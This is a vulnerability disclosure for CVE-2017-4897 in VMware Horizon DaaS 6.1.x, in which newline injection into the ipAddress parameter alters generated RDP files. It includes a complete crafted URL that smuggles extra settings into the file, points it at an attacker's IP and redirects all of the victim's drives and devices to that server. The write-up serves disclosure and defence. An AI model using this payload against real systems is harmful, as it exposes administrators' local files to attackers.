Vulnerability Disclosure - VMware Horizon DaaS - Improper IP Address Validation

VMSA-2017-0002, CVE-2017-4897
Publish date: March 10 2017
Vendor: VMware
Product: Horizon Daas Platform
Versions affected: 6.1.x
Fixed version: 7.0.0
Author: Ahmad Ashraff

A security advisory was released by the VMware Security Team on the 3rd of March 2017 in their Security Blog.

Improper IP Address Validation by getRdpByIP (CVE-2017-4897)

Horizon DaaS allows a creation of a remote desktop connection file through the application. This process only can be performed by a user with administrative privilege. The request will look similar to the following:

<host>/admin/getRdpByIp.action?ipAddress=<ip address>

However, it was found that the ipAddress parameter does not properly validate the input supplied by a user. By using newline characters (%0a) in the parameter, it is possible to include extra settings into the remote desktop connection file, such as drive mapping redirections.

Example:

https://<host>/admin/getRdpByIp.action?ipAddress=<attacker's ip address>:3389%0aconnect%20to%20console:i:1%0aadministrative%20session:i:1%0ausername:s:Administrator%0adomain:s:.%0ascreen%20mode%20id:i:2%0ause%20multimon:i:0%0adesktopwidth:i:800%0adesktopheight:i:600%0asession%20bpp:i:32%0awinposstr:s:0,3,0,0,800,600%0acompression:i:1%0akeyboardhook:i:2%0aaudiocapturemode:i:0%0avideoplaybackmode:i:1%0aconnection%20type:i:2%0adisplayconnectionbar:i:1%0adisable%20wallpaper:i:1%0aallow%20font%20smoothing:i:0%0aallow%20desktop%20composition:i:0%0adisable%20full%20window%20drag:i:1%0adisable%20menu%20anims:i:1%0adisable%20themes:i:0%0adisable%20cursor%20setting:i:0%0abitmapcachepersistenable:i:1%0aaudiomode:i:0%0aredirectprinters:i:1%0aredirectcomports:i:1%0aredirectsmartcards:i:1%0aredirectclipboard:i:1%0aredirectposdevices:i:0%0aredirectdirectx:i:1%0adevicestoredirect:s:*%0adrivestoredirect:s:*%0aautoreconnection%20enabled:i:1%0aauthentication%20level:i:2%0aprompt%20for%20credentials:i:0%0anegotiate%20security%20layer:i:1%0aremoteapplicationmode:i:0%0aalternate%20shell:s:%0ashell%20working%20directory:s:%0agatewayhostname:s:%0agatewayusagemethod:i:4%0agatewaycredentialssource:i:4%0agatewayprofileusagemethod:i:0%0apromptcredentialonce:i:1%0ause%20edirection%20server%20name:i:0%0anull

An authenticated administrator that was manipulated into clicking the above URL will receive a remote desktop connection file. Once this file is opened, it will connect to the attacker’s IP address such that their local drive will be mapped to the attacker’s remote desktop server.